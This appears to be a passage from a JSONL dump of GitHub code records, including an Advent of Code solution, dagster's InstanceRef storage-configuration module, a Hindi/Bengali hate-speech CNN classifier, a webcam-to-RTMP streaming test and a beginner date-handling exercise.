w[0] == '$':\n\t\t\tif w[1] == \"ls\":\n\t\t\t\tisls = True\n\t\t\telif w[1] == \"cd\":\n\t\t\t\tif w[2] == \"..\":\n\t\t\t\t\tpath.pop()\n\t\t\t\t\twd = fs\n\t\t\t\t\tfor c in path:\n\t\t\t\t\t\twd = wd[c]\n\t\t\t\telse:\n\t\t\t\t\tpath.append(w[2])\n\t\t\t\t\twd = wd[w[2]]\n\t\ti = i + 1\n\treturn fs\n\ndef part1(d, indent=0):\n\ttmp = 0\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\ttmp += part1(value, indent+1)\n\t\tif key == \"directory_size\" and int(value) <= 100000:\n\t\t\ttmp += int(value)\n\treturn tmp\n\ndef part2(d, max, smallest):\n\tfor key, value in d.items():\n\t\tif isinstance(value, dict):\n\t\t\tsmallest = part2(value, max, smallest)\n\t\tif key == \"directory_size\" and int(value) >= max and int(value) < smallest:\n\t\t\tsmallest = int(value)\n\treturn smallest\n\nf = open(sys.argv[1], 'r')\nfile = f.read().splitlines()\n\nfs = build_filesystem(file)\nfs_size = count_sizes(fs)\ndraw_filesystem(fs)\nprint()\n\nprint(\"part1: \" + str(part1(fs)))\nfreespace = 70000000 - fs_size\nneed_to_free = 30000000 - freespace\nprint(\"part2: \" + str(part2(fs, need_to_free, 9999999999)))\n","repo_name":"rpehkone/adventofcode","sub_path":"2022/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9888072747","text":"import os\nfrom typing import TYPE_CHECKING, Any, Mapping, 
NamedTuple, Optional, Sequence, Type\n\nimport yaml\n\nimport dagster._check as check\nfrom dagster._serdes import ConfigurableClassData, class_from_code_pointer, whitelist_for_serdes\n\nfrom .config import DAGSTER_CONFIG_YAML_FILENAME, dagster_instance_config\n\nif TYPE_CHECKING:\n from dagster._core.instance import DagsterInstance, DagsterInstanceOverrides\n from dagster._core.launcher.base import RunLauncher\n from dagster._core.run_coordinator.base import RunCoordinator\n from dagster._core.scheduler.scheduler import Scheduler\n from dagster._core.secrets.loader import SecretsLoader\n from dagster._core.storage.base_storage import DagsterStorage\n from dagster._core.storage.compute_log_manager import ComputeLogManager\n from dagster._core.storage.event_log.base import EventLogStorage\n from dagster._core.storage.root import LocalArtifactStorage\n from dagster._core.storage.runs.base import RunStorage\n from dagster._core.storage.schedules.base import ScheduleStorage\n\n\ndef compute_logs_directory(base: str) -> str:\n return os.path.join(base, \"storage\")\n\n\ndef _runs_directory(base: str) -> str:\n return os.path.join(base, \"history\", \"\")\n\n\ndef _event_logs_directory(base: str) -> str:\n return os.path.join(base, \"history\", \"runs\", \"\")\n\n\ndef _schedule_directory(base: str) -> str:\n return os.path.join(base, \"schedules\")\n\n\ndef configurable_class_data(config_field: Mapping[str, Any]) -> ConfigurableClassData:\n return ConfigurableClassData(\n check.str_elem(config_field, \"module\"),\n check.str_elem(config_field, \"class\"),\n yaml.dump(check.opt_dict_elem(config_field, \"config\"), default_flow_style=False),\n )\n\n\ndef configurable_class_data_or_default(\n config_value: Mapping[str, Any], field_name: str, default: Optional[ConfigurableClassData]\n) -> Optional[ConfigurableClassData]:\n return (\n configurable_class_data(config_value[field_name])\n if config_value.get(field_name)\n else default\n )\n\n\ndef configurable_secrets_loader_data(\n config_field: Mapping[str, Any], default: Optional[ConfigurableClassData]\n) -> Optional[ConfigurableClassData]:\n if not config_field:\n return default\n elif \"custom\" in config_field:\n return configurable_class_data(config_field[\"custom\"])\n else:\n return None\n\n\ndef configurable_storage_data(\n config_field: Mapping[str, Any], defaults: Mapping[str, Optional[ConfigurableClassData]]\n) -> Sequence[Optional[ConfigurableClassData]]:\n storage_data: ConfigurableClassData\n run_storage_data: Optional[ConfigurableClassData]\n event_storage_data: Optional[ConfigurableClassData]\n schedule_storage_data: Optional[ConfigurableClassData]\n\n if not config_field:\n storage_data = check.not_none(defaults.get(\"storage\"))\n run_storage_data = check.not_none(defaults.get(\"run_storage\"))\n event_storage_data = check.not_none(defaults.get(\"event_log_storage\"))\n schedule_storage_data = check.not_none(defaults.get(\"schedule_storage\"))\n elif \"postgres\" in config_field:\n config_yaml = yaml.dump(config_field[\"postgres\"], default_flow_style=False)\n storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"DagsterPostgresStorage\",\n config_yaml=config_yaml,\n )\n # for backwards compatibility\n run_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresRunStorage\",\n config_yaml=config_yaml,\n )\n event_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresEventLogStorage\",\n config_yaml=config_yaml,\n 
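# editor's note: the three legacy Postgres storage classes share the same\n        # config_yaml as the unified DagsterPostgresStorage above\n        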
)\n schedule_storage_data = ConfigurableClassData(\n module_name=\"dagster_postgres\",\n class_name=\"PostgresScheduleStorage\",\n config_yaml=config_yaml,\n )\n\n elif \"mysql\" in config_field:\n config_yaml = yaml.dump(config_field[\"mysql\"], default_flow_style=False)\n storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"DagsterMySQLStorage\",\n config_yaml=config_yaml,\n )\n # for backwards compatibility\n run_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLRunStorage\",\n config_yaml=config_yaml,\n )\n event_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLEventLogStorage\",\n config_yaml=config_yaml,\n )\n schedule_storage_data = ConfigurableClassData(\n module_name=\"dagster_mysql\",\n class_name=\"MySQLScheduleStorage\",\n config_yaml=config_yaml,\n )\n\n elif \"sqlite\" in config_field:\n base_dir = config_field[\"sqlite\"][\"base_dir\"]\n storage_data = ConfigurableClassData(\n \"dagster._core.storage.sqlite_storage\",\n \"DagsterSqliteStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n )\n\n # Back-compat fo the legacy storage field only works if the base_dir is a string\n # (env var doesn't work since each storage has a different value for the base_dir field)\n if isinstance(base_dir, str):\n run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.runs\",\n \"SqliteRunStorage\",\n yaml.dump({\"base_dir\": _runs_directory(base_dir)}, default_flow_style=False),\n )\n\n event_storage_data = ConfigurableClassData(\n \"dagster._core.storage.event_log\",\n \"SqliteEventLogStorage\",\n yaml.dump({\"base_dir\": _event_logs_directory(base_dir)}, default_flow_style=False),\n )\n\n schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.schedules\",\n \"SqliteScheduleStorage\",\n yaml.dump({\"base_dir\": _schedule_directory(base_dir)}, default_flow_style=False),\n )\n else:\n run_storage_data = None\n event_storage_data = None\n schedule_storage_data = None\n else:\n storage_data = configurable_class_data(config_field[\"custom\"])\n storage_config_yaml = yaml.dump(\n {\n \"module_name\": storage_data.module_name,\n \"class_name\": storage_data.class_name,\n \"config_yaml\": storage_data.config_yaml,\n },\n default_flow_style=False,\n )\n run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyRunStorage\", storage_config_yaml\n )\n event_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyEventLogStorage\", storage_config_yaml\n )\n schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.legacy_storage\", \"LegacyScheduleStorage\", storage_config_yaml\n )\n\n return [storage_data, run_storage_data, event_storage_data, schedule_storage_data]\n\n\n@whitelist_for_serdes\nclass InstanceRef(\n NamedTuple(\n \"_InstanceRef\",\n [\n (\"local_artifact_storage_data\", ConfigurableClassData),\n (\"compute_logs_data\", ConfigurableClassData),\n (\"scheduler_data\", Optional[ConfigurableClassData]),\n (\"run_coordinator_data\", Optional[ConfigurableClassData]),\n (\"run_launcher_data\", Optional[ConfigurableClassData]),\n (\"settings\", Mapping[str, object]),\n # Required for backwards compatibility, but going forward will be unused by new versions\n # of DagsterInstance, which instead will instead grab the constituent storages from the\n # unified `storage_data`, if it is populated.\n (\"run_storage_data\", 
Optional[ConfigurableClassData]),\n (\"event_storage_data\", Optional[ConfigurableClassData]),\n (\"schedule_storage_data\", Optional[ConfigurableClassData]),\n (\"custom_instance_class_data\", Optional[ConfigurableClassData]),\n # unified storage field\n (\"storage_data\", Optional[ConfigurableClassData]),\n (\"secrets_loader_data\", Optional[ConfigurableClassData]),\n ],\n )\n):\n \"\"\"Serializable representation of a :py:class:`DagsterInstance`.\n\n Users should not instantiate this class directly.\n \"\"\"\n\n def __new__(\n cls,\n local_artifact_storage_data: ConfigurableClassData,\n compute_logs_data: ConfigurableClassData,\n scheduler_data: Optional[ConfigurableClassData],\n run_coordinator_data: Optional[ConfigurableClassData],\n run_launcher_data: Optional[ConfigurableClassData],\n settings: Mapping[str, object],\n run_storage_data: Optional[ConfigurableClassData],\n event_storage_data: Optional[ConfigurableClassData],\n schedule_storage_data: Optional[ConfigurableClassData],\n custom_instance_class_data: Optional[ConfigurableClassData] = None,\n storage_data: Optional[ConfigurableClassData] = None,\n secrets_loader_data: Optional[ConfigurableClassData] = None,\n ):\n return super(cls, InstanceRef).__new__(\n cls,\n local_artifact_storage_data=check.inst_param(\n local_artifact_storage_data, \"local_artifact_storage_data\", ConfigurableClassData\n ),\n compute_logs_data=check.inst_param(\n compute_logs_data, \"compute_logs_data\", ConfigurableClassData\n ),\n scheduler_data=check.opt_inst_param(\n scheduler_data, \"scheduler_data\", ConfigurableClassData\n ),\n run_coordinator_data=check.opt_inst_param(\n run_coordinator_data, \"run_coordinator_data\", ConfigurableClassData\n ),\n run_launcher_data=check.opt_inst_param(\n run_launcher_data, \"run_launcher_data\", ConfigurableClassData\n ),\n settings=check.opt_mapping_param(settings, \"settings\", key_type=str),\n run_storage_data=check.opt_inst_param(\n run_storage_data, \"run_storage_data\", ConfigurableClassData\n ),\n event_storage_data=check.opt_inst_param(\n event_storage_data, \"event_storage_data\", ConfigurableClassData\n ),\n schedule_storage_data=check.opt_inst_param(\n schedule_storage_data, \"schedule_storage_data\", ConfigurableClassData\n ),\n custom_instance_class_data=check.opt_inst_param(\n custom_instance_class_data,\n \"instance_class\",\n ConfigurableClassData,\n ),\n storage_data=check.opt_inst_param(storage_data, \"storage_data\", ConfigurableClassData),\n secrets_loader_data=check.opt_inst_param(\n secrets_loader_data, \"secrets_loader_data\", ConfigurableClassData\n ),\n )\n\n @staticmethod\n def config_defaults(base_dir: str) -> Mapping[str, Optional[ConfigurableClassData]]:\n default_run_storage_data = ConfigurableClassData(\n \"dagster._core.storage.runs\",\n \"SqliteRunStorage\",\n yaml.dump({\"base_dir\": _runs_directory(base_dir)}, default_flow_style=False),\n )\n default_event_log_storage_data = ConfigurableClassData(\n \"dagster._core.storage.event_log\",\n \"SqliteEventLogStorage\",\n yaml.dump({\"base_dir\": _event_logs_directory(base_dir)}, default_flow_style=False),\n )\n default_schedule_storage_data = ConfigurableClassData(\n \"dagster._core.storage.schedules\",\n \"SqliteScheduleStorage\",\n yaml.dump({\"base_dir\": _schedule_directory(base_dir)}, default_flow_style=False),\n )\n\n return {\n \"local_artifact_storage\": ConfigurableClassData(\n \"dagster._core.storage.root\",\n \"LocalArtifactStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n ),\n \"storage\": 
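# editor's note: the unified storage default; a single DagsterSqliteStorage\n            # serves runs, event logs and schedules from one base_dir\n            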
ConfigurableClassData(\n \"dagster._core.storage.sqlite_storage\",\n \"DagsterSqliteStorage\",\n yaml.dump({\"base_dir\": base_dir}, default_flow_style=False),\n ),\n \"compute_logs\": ConfigurableClassData(\n \"dagster._core.storage.local_compute_log_manager\",\n \"LocalComputeLogManager\",\n yaml.dump({\"base_dir\": compute_logs_directory(base_dir)}, default_flow_style=False),\n ),\n \"scheduler\": ConfigurableClassData(\n \"dagster._core.scheduler\",\n \"DagsterDaemonScheduler\",\n yaml.dump({}),\n ),\n \"run_coordinator\": ConfigurableClassData(\n \"dagster._core.run_coordinator\", \"DefaultRunCoordinator\", yaml.dump({})\n ),\n \"run_launcher\": ConfigurableClassData(\n \"dagster\",\n \"DefaultRunLauncher\",\n yaml.dump({}),\n ),\n # For back-compat, the default is actually set in the secrets_loader property above,\n # so that old clients loading new config don't try to load a class that they\n # don't recognize\n \"secrets\": None,\n # LEGACY DEFAULTS\n \"run_storage\": default_run_storage_data,\n \"event_log_storage\": default_event_log_storage_data,\n \"schedule_storage\": default_schedule_storage_data,\n }\n\n @staticmethod\n def from_dir(\n base_dir: str,\n *,\n config_dir: Optional[str] = None,\n config_filename: str = DAGSTER_CONFIG_YAML_FILENAME,\n overrides: Optional[\"DagsterInstanceOverrides\"] = None,\n ) -> \"InstanceRef\":\n if config_dir is None:\n config_dir = base_dir\n\n overrides = check.opt_mapping_param(overrides, \"overrides\")\n config_value, custom_instance_class = dagster_instance_config(\n config_dir, config_filename=config_filename, overrides=overrides\n )\n\n if custom_instance_class:\n config_keys = set(custom_instance_class.config_schema().keys()) # type: ignore # (undefined method)\n custom_instance_class_config = {\n key: val for key, val in config_value.items() if key in config_keys\n }\n custom_instance_class_data = ConfigurableClassData(\n config_value[\"instance_class\"][\"module\"],\n config_value[\"instance_class\"][\"class\"],\n yaml.dump(custom_instance_class_config, default_flow_style=False),\n )\n defaults = custom_instance_class.config_defaults(base_dir) # type: ignore # (undefined method)\n else:\n custom_instance_class_data = None\n defaults = InstanceRef.config_defaults(base_dir)\n\n local_artifact_storage_data = configurable_class_data_or_default(\n config_value, \"local_artifact_storage\", defaults[\"local_artifact_storage\"]\n )\n\n compute_logs_data = configurable_class_data_or_default(\n config_value,\n \"compute_logs\",\n defaults[\"compute_logs\"],\n )\n\n if (\n config_value.get(\"run_storage\")\n or config_value.get(\"event_log_storage\")\n or config_value.get(\"schedule_storage\")\n ):\n # using legacy config, specifying config for each of the constituent storages, make sure\n # to create a composite storage\n run_storage_data = configurable_class_data_or_default(\n config_value, \"run_storage\", defaults[\"run_storage\"]\n )\n event_storage_data = configurable_class_data_or_default(\n config_value, \"event_log_storage\", defaults[\"event_log_storage\"]\n )\n schedule_storage_data = configurable_class_data_or_default(\n config_value, \"schedule_storage\", defaults[\"schedule_storage\"]\n )\n storage_data = ConfigurableClassData(\n module_name=\"dagster._core.storage.legacy_storage\",\n class_name=\"CompositeStorage\",\n config_yaml=yaml.dump(\n {\n \"run_storage\": {\n \"module_name\": run_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": run_storage_data.class_name, # type: ignore # (possible none)\n 
\"config_yaml\": run_storage_data.config_yaml, # type: ignore # (possible none)\n },\n \"event_log_storage\": {\n \"module_name\": event_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": event_storage_data.class_name, # type: ignore # (possible none)\n \"config_yaml\": event_storage_data.config_yaml, # type: ignore # (possible none)\n },\n \"schedule_storage\": {\n \"module_name\": schedule_storage_data.module_name, # type: ignore # (possible none)\n \"class_name\": schedule_storage_data.class_name, # type: ignore # (possible none)\n \"config_yaml\": schedule_storage_data.config_yaml, # type: ignore # (possible none)\n },\n },\n default_flow_style=False,\n ),\n )\n\n else:\n [\n storage_data,\n run_storage_data,\n event_storage_data,\n schedule_storage_data,\n ] = configurable_storage_data(\n config_value.get(\"storage\"), # type: ignore # (possible none)\n defaults,\n )\n\n scheduler_data = configurable_class_data_or_default(\n config_value, \"scheduler\", defaults[\"scheduler\"]\n )\n\n if config_value.get(\"run_queue\"):\n run_coordinator_data = configurable_class_data(\n {\n \"module\": \"dagster.core.run_coordinator\",\n \"class\": \"QueuedRunCoordinator\",\n \"config\": config_value[\"run_queue\"],\n }\n )\n else:\n run_coordinator_data = configurable_class_data_or_default(\n config_value,\n \"run_coordinator\",\n defaults[\"run_coordinator\"],\n )\n\n run_launcher_data = configurable_class_data_or_default(\n config_value,\n \"run_launcher\",\n defaults[\"run_launcher\"],\n )\n\n secrets_loader_data = configurable_secrets_loader_data(\n config_value.get(\"secrets\"), # type: ignore # (possible none)\n defaults[\"secrets\"],\n )\n\n settings_keys = {\n \"telemetry\",\n \"python_logs\",\n \"run_monitoring\",\n \"run_retries\",\n \"code_servers\",\n \"retention\",\n \"sensors\",\n \"schedules\",\n \"nux\",\n \"auto_materialize\",\n }\n settings = {key: config_value.get(key) for key in settings_keys if config_value.get(key)}\n\n return InstanceRef(\n local_artifact_storage_data=local_artifact_storage_data, # type: ignore # (possible none)\n run_storage_data=run_storage_data,\n event_storage_data=event_storage_data,\n compute_logs_data=compute_logs_data, # type: ignore # (possible none)\n schedule_storage_data=schedule_storage_data,\n scheduler_data=scheduler_data,\n run_coordinator_data=run_coordinator_data,\n run_launcher_data=run_launcher_data,\n settings=settings,\n custom_instance_class_data=custom_instance_class_data,\n storage_data=storage_data,\n secrets_loader_data=secrets_loader_data,\n )\n\n @staticmethod\n def from_dict(instance_ref_dict):\n def value_for_ref_item(k, v):\n if v is None:\n return None\n if k == \"settings\":\n return v\n return ConfigurableClassData(*v)\n\n return InstanceRef(**{k: value_for_ref_item(k, v) for k, v in instance_ref_dict.items()})\n\n @property\n def local_artifact_storage(self) -> \"LocalArtifactStorage\":\n from dagster._core.storage.root import LocalArtifactStorage\n\n return self.local_artifact_storage_data.rehydrate(as_type=LocalArtifactStorage)\n\n @property\n def storage(self) -> Optional[\"DagsterStorage\"]:\n from dagster._core.storage.base_storage import DagsterStorage\n\n return self.storage_data.rehydrate(as_type=DagsterStorage) if self.storage_data else None\n\n @property\n def run_storage(self) -> Optional[\"RunStorage\"]:\n from dagster._core.storage.runs.base import RunStorage\n\n return (\n self.run_storage_data.rehydrate(as_type=RunStorage) if self.run_storage_data else None\n )\n\n @property\n def 
event_storage(self) -> Optional[\"EventLogStorage\"]:\n from dagster._core.storage.event_log.base import EventLogStorage\n\n return (\n self.event_storage_data.rehydrate(as_type=EventLogStorage)\n if self.event_storage_data\n else None\n )\n\n @property\n def schedule_storage(self) -> Optional[\"ScheduleStorage\"]:\n from dagster._core.storage.schedules.base import ScheduleStorage\n\n return (\n self.schedule_storage_data.rehydrate(as_type=ScheduleStorage)\n if self.schedule_storage_data\n else None\n )\n\n @property\n def compute_log_manager(self) -> \"ComputeLogManager\":\n from dagster._core.storage.compute_log_manager import ComputeLogManager\n\n return self.compute_logs_data.rehydrate(as_type=ComputeLogManager)\n\n @property\n def scheduler(self) -> Optional[\"Scheduler\"]:\n from dagster._core.scheduler.scheduler import Scheduler\n\n return self.scheduler_data.rehydrate(as_type=Scheduler) if self.scheduler_data else None\n\n @property\n def run_coordinator(self) -> Optional[\"RunCoordinator\"]:\n from dagster._core.run_coordinator.base import RunCoordinator\n\n return (\n self.run_coordinator_data.rehydrate(as_type=RunCoordinator)\n if self.run_coordinator_data\n else None\n )\n\n @property\n def run_launcher(self) -> Optional[\"RunLauncher\"]:\n from dagster._core.launcher.base import RunLauncher\n\n return (\n self.run_launcher_data.rehydrate(as_type=RunLauncher)\n if self.run_launcher_data\n else None\n )\n\n @property\n def secrets_loader(self) -> Optional[\"SecretsLoader\"]:\n from dagster._core.secrets.loader import SecretsLoader\n\n # Defining a default here rather than in stored config to avoid\n # back-compat issues when loading the config on older versions where\n # EnvFileLoader was not defined\n return (\n self.secrets_loader_data.rehydrate(as_type=SecretsLoader)\n if self.secrets_loader_data\n else None\n )\n\n @property\n def custom_instance_class(self) -> Type[\"DagsterInstance\"]:\n return ( # type: ignore # (ambiguous return type)\n class_from_code_pointer(\n self.custom_instance_class_data.module_name,\n self.custom_instance_class_data.class_name,\n )\n if self.custom_instance_class_data\n else None\n )\n\n @property\n def custom_instance_class_config(self) -> Mapping[str, Any]:\n return (\n self.custom_instance_class_data.config_dict if self.custom_instance_class_data else {}\n )\n\n def to_dict(self) -> Mapping[str, Any]:\n return self._asdict()\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/instance/ref.py","file_name":"ref.py","file_ext":"py","file_size_in_byte":24114,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"17329056646","text":"#!pip install torchtext==0.4.0\n\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.nn as nn\nimport torchtext.vocab as vocab\nfrom DataPreprocess import *\nfrom TrainEvalLoops import *\nfrom model import *\n\nchoice = input(\"Type 'h' to run model for Hindi and 'b' for Bengali:\\n\")\nif choice == 'h':\n print(f'You entered {choice}, running sentiment analysis for Hindi.')\n\n #HINDI\n url = 'Data/hindi_hatespeech.tsv'\n df = pd.read_csv(url, sep='\\t')\n #clean data\n df['text'] = clean_data(df['text'])\n df['text'] = remove_hindi_stopwords(df['text'])\n df = hindi_drop_columns(df) #dropping columns we don't need \n #load our custom embeddings into vocab vector\n #custom_embeddings = vocab.Vectors(name = 'HindiEmbeddings.txt') 
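# --- A hedged usage sketch for the InstanceRef code in the dagster record above.
# InstanceRef.from_dir and the rehydrating properties are the ones defined in that
# record; the DAGSTER_HOME path here is illustrative only.
from dagster._core.instance.ref import InstanceRef

ref = InstanceRef.from_dir("/tmp/dagster_home")  # parses /tmp/dagster_home/dagster.yaml
unified_storage = ref.storage    # preferred by newer DagsterInstance versions
legacy_runs = ref.run_storage    # populated only for backwards compatibility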
#basic skipgram embeddings\n    custom_embeddings = vocab.Vectors(name = 'Data/HindiEmbeddingsUpdated.txt') #sgns embeddings\n\nif choice == 'b':\n    print(f'You entered {choice}, running sentiment analysis for Bengali.')\n\n    #BENGALI\n    url = 'Data/bengali_hatespeech.csv'\n    df = pd.read_csv(url,header = None)\n    df = reduce_bengali(df)\n    #clean data\n    df[0] = clean_data(df[0])\n    df[0] = remove_bengali_stopwords(df[0])\n    df = bengali_drop_columns(df) #dropping columns we don't need \n    #load our custom embeddings into vocab vector\n    #custom_embeddings = vocab.Vectors(name = 'Data/BengaliEmb.txt') #basic skipgram embeddings\n    custom_embeddings = vocab.Vectors(name = 'Data/BengaliEmbeddingsUpdated.txt') #sgns embeddings\n\nTEXT = data.Field(sequential=True, batch_first=True)\nLABEL = data.LabelField(dtype=torch.float)\n\ndf.columns = ['text','label'] \nfields = { 'text' : TEXT, 'label':LABEL }\ntrain_ds = DataFrameDataset(df, fields) #convert pandas df to torchtext df\n\nTEXT.build_vocab(train_ds, vectors = custom_embeddings)\nLABEL.build_vocab(train_ds)\n#store our pretrained word embeddings in this variable to pass to our network\npretrained = TEXT.vocab.vectors\n\n#make test and train splits\nSEED = 32\ntrain_size = int(0.75*len(train_ds)) #use 75% for training and rest for testing\nval_size = len(train_ds)-train_size\ntrain_dataset,val_dataset = train_ds.split([train_size,val_size], random_state = random.seed(SEED))\n\n#define hyperparameters\nINPUT_DIM = len(TEXT.vocab)\nEMBEDDING_DIM = 300\nN_FILTERS = 200\nFILTER_SIZES = [2,3,4,5]\nOUTPUT_DIM = 1\nDROPOUT = 0.5\nPAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]\nBATCH_SIZE = 500\nEPOCHS = 3\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n#create our dataloaders\ntrain_iterator, valid_iterator = data.BucketIterator.splits(\n    (train_dataset, val_dataset), \n    batch_size = BATCH_SIZE,\n    sort_within_batch = False,\n    sort_key = lambda x: len(x.text),\n    device = device)\n\n\nmodel = CNN(INPUT_DIM, EMBEDDING_DIM, N_FILTERS, FILTER_SIZES, OUTPUT_DIM, DROPOUT, PAD_IDX)\n\n#ensure the embedding rows for the unknown and padding tokens are set to zero\nmodel.embedding.weight.data.copy_(pretrained)\nUNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]\n\nmodel.embedding.weight.data[UNK_IDX] = torch.zeros(EMBEDDING_DIM)\nmodel.embedding.weight.data[PAD_IDX] = torch.zeros(EMBEDDING_DIM)\n\noptimizer = optim.Adam(model.parameters(), lr=5e-3)\n\ncriterion = nn.BCEWithLogitsLoss()\n\nmodel = model.to(device)\n\ncriterion = criterion.to(device)\n\nfor epoch in range(EPOCHS):\n\n    train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n    \n    print(f'Epoch: {epoch+1:02}')\n    print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n\n\n\ntest_loss, test_acc = evaluate(model, valid_iterator, criterion)\n\nprint(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')\n","repo_name":"kushagra801/NLPproject-HateSpeechClassification","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17432059494","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nTest RTMP streaming\n\nUsage:\n\n\n\"\"\"\n\nimport argparse\nimport time\n\nimport cv2\nimport queue\nfrom threading import Thread\nimport datetime, _thread\nimport imutils\nimport subprocess\n\n\nimport tensorflow as tf\nimport keras\nfrom flask import Flask, render_template, Response, request\nfrom imutils.video import WebcamVideoStream\nfrom keras.models
import load_model\nfrom A_Final_Sys.oldcare.facial import FaceUtil\nfrom A_Final_Sys.oldcare.camera import VideoCamera\nfrom A_Final_Sys.oldcare.utils import Time_Controller\nfrom A_Final_Sys.oldcare.utils import Fence_Tools\nfrom A_Final_Sys.oldcare.utils import getIP\nfrom flask_cors import *\nfrom A_Final_Sys.oldcare.utils import fileassistant\nimport keras.backend.tensorflow_backend as K\nimport subprocess as sp\n\n\nVIDEO_WIDTH = 640\nVIDEO_HEIGHT = 480\nANGLE = 20\n# global constants\n\nlimit_time = 2\n# use a thread lock to avoid deadlocks between threads\nmutex = _thread.allocate_lock()\n# queue holding the captured frames\nframe_queue = queue.Queue()\n\nrtmpUrl = \"rtmp://localhost:1935/rtmplive\"\n\ncommand = ['ffmpeg',\n           '-y',\n           '-f', 'rawvideo',\n           '-vcodec', 'rawvideo',\n           '-pix_fmt', 'bgr24',\n           '-s', \"{}x{}\".format(640, 480),  # frame resolution\n           '-r', str(10.0),  # video frame rate\n           '-i', '-',\n           '-c:v', 'libx264',\n           '-pix_fmt', 'yuv420p',\n           '-preset', 'ultrafast',\n           '-f', 'flv',\n           rtmpUrl]\n\n\n\ndef Video():\n    # grab frames from the camera\n    vid = cv2.VideoCapture(0)\n    time.sleep(2)\n    if not vid.isOpened():\n        raise IOError(\"Couldn't open webcam or video\")\n\n    while (vid.isOpened()):\n        return_value, frame = vid.read()\n        # push the raw frame into the queue\n        frame_queue.put(frame)\n        frame_queue.get() if frame_queue.qsize() > 1 else time.sleep(0.01)\n\n\n\ndef push_frame():\n    # push frames to the RTMP stream\n    accum_time = 0\n    curr_fps = 0\n    fps = \"FPS: ??\"\n    # prev_time = time()\n    # make sure command has been set before using it from multiple threads\n    while True:\n        print('command length', len(command))\n        if len(command) > 0:\n            # pipe configuration: feed ffmpeg through a subprocess pipe\n            p = sp.Popen(command, stdin=sp.PIPE)\n            break\n\n    while True:\n        if frame_queue.empty() != True:\n            counter = 0\n\n            while True:\n                counter += 1\n                image = frame_queue.get()\n                if counter%2 != 0:  # skip every other frame\n                    continue\n                image = cv2.flip(image, 1)  # mirror flip\n                image = cv2.resize(image, (640, 480))  # resize before streaming\n                p.stdin.write(image.tobytes())  # raw BGR bytes for ffmpeg's stdin\n                print(counter)\n\n\n\n\ndef run():\n    # handle capture and push in two threads\n    thread1 = Thread(target=Video, )\n    thread1.start()\n    time.sleep(2)\n    thread2 = Thread(target=push_frame, )\n    thread2.start()\n    cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n    run()\n\n\n\n\n\n","repo_name":"huijieXue1020/CVpart","sub_path":"rtmptest.py","file_name":"rtmptest.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4192361006","text":"\"\"\"\n\nThe datetime module provides date and time objects and a rich set of methods and operators. Read the documentation [here](https://docs.python.org/2/library/datetime.html). Submit the following in a file named `date.py`.\n\n1. Use the datetime module to write a program that gets the current date and prints the day of the week.\n2. Write a program that takes a birthday as input and prints the user’s age and the number of days, hours, minutes and seconds until their next birthday.\n3. For two people born on different days, there is a day when one is twice as old as the other. That’s their Double Day. Write a program that takes two birthdays and computes their Double Day.\n4. 
For a little more challenge, write the more general version that computes the day when one person is n times older than the other.\n\n\n\"\"\"\n\nimport time\n\nfrom datetime import date\nfrom datetime import datetime\n\ndef next_bday(year,month,day):\n\t\n\ttoday = datetime.now()\n\n\tmy_bday = datetime(today.year , month , day)\n\n\t# roll over to next year if this year's birthday has already passed\n\tif my_bday < today:\n\t\tmy_bday = datetime(today.year + 1 , month , day)\n\n\ttime_to_bday = my_bday - today\n\n\tage = today.year - year\n\n\tprint(\"Age of person : \", age)\n\t\t\n\tprint(\"Days to birthday :\", time_to_bday.days)\n\n\tprint(\"Hours to birthday :\", time_to_bday.seconds // 3600 )\n\n\tprint(\"Minutes to birthday :\", time_to_bday.seconds % 3600 // 60 )\n\n\tprint(\"Seconds to birthday :\", time_to_bday.seconds % 60 )\n\ntoday = date.today()\n\nprint(\"Current day and date ::\", today.strftime(\"%A\"),today)\n\nnext_bday(1992,12,14)\n\n\n\n\n\n\n\n\n","repo_name":"Ananth-Adhikarla/Python-Programming","sub_path":"date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23961404928","text":"import os\t\t # these lines import the libraries needed for the GUI\r\nfrom tkinter import *\r\nimport tkinter.messagebox as tm\r\nimport datetime\r\nimport tkinter as tk\r\nimport shutil\r\n\r\ndef developer(self, root, LoginFrame, 